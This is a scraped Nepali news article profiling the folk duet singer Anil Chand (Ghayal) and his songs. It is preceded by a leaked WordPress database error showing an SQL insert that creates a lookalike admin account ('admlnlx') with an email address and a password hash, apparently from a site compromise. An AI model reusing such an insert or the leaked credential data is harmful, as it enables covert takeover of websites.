WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxYTAOnxvjUzoW6NYIkbx4dMd2i5FE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 08:29:39', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,पुस ९-
लोक दोहोरी गायक अनिल चन्द(घायल) यतिवेला चर्चामा छन् उनले गाएका गित स्रोता दर्शकले मन पराउन थालेपछी उनको चर्चा वढ्न थालेको हो ।कालीकोट जिल्ला पाखा गाड्डविड्डसड्ड वडा ५ घरभइ कर्मथलो सुर्खेत बनाउदै आएका अनिल यतिवेला प्रवास बाटनै दर्जनौ गितहरुमा लय,शब्द, र स्वर भर्न सफल भएका छन् ।
बाल्यकालदेखिनै लोक दोहोरी गाउने अनिल विद्यालयका विभिन्न कार्यक्रममा गित गाएर यस क्षेत्रमा प्रवेश गरेका हुन् । उनले अपुरो हाम्रो प्रेम,आंसु उपहार,पहिलो प्रेम,प्रेममा घात जस्ता दर्जनौ गितहरु बजारमा ल्याइसकेका छन् । उनका अन्य गितहरु प्नि वजारमा आउने तयारीमा छन् ।